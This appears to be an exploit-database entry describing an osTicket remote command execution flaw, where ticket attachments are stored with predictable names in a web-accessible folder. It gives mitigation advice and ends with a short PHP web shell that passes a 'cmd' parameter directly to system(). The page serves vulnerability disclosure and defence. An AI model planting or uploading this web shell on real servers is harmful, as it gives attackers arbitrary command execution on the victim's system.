header-logo
Suggest Exploit
vendor:
osTicket
by:
7.5
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: osTicket
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

osTicket Remote Command Execution Vulnerability

osTicket is prone to a remote command execution vulnerability. Attachments submitted as part of a support ticket request are stored with a predictable name in a known web accessible location. An attacker can exploit this vulnerability by submitting a malicious attachment and executing arbitrary commands on the affected system.

Mitigation:

To mitigate this vulnerability, ensure that attachments are properly sanitized and stored with unpredictable names. Additionally, consider implementing access controls to limit public access to attachment directories.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10586/info

osTicket is reported prone to a remote command execution vulnerability. The issue is reported to present itself because attachments submitted as a part of a support ticket request are stored with a predictable name in a known web accessible location.

<?PHP
echo "<form action = ''><input type = 'text' name = 'cmd' value = '$cmd' size = '75'><BR>";
if (!$cmd)die;
system($cmd);
?>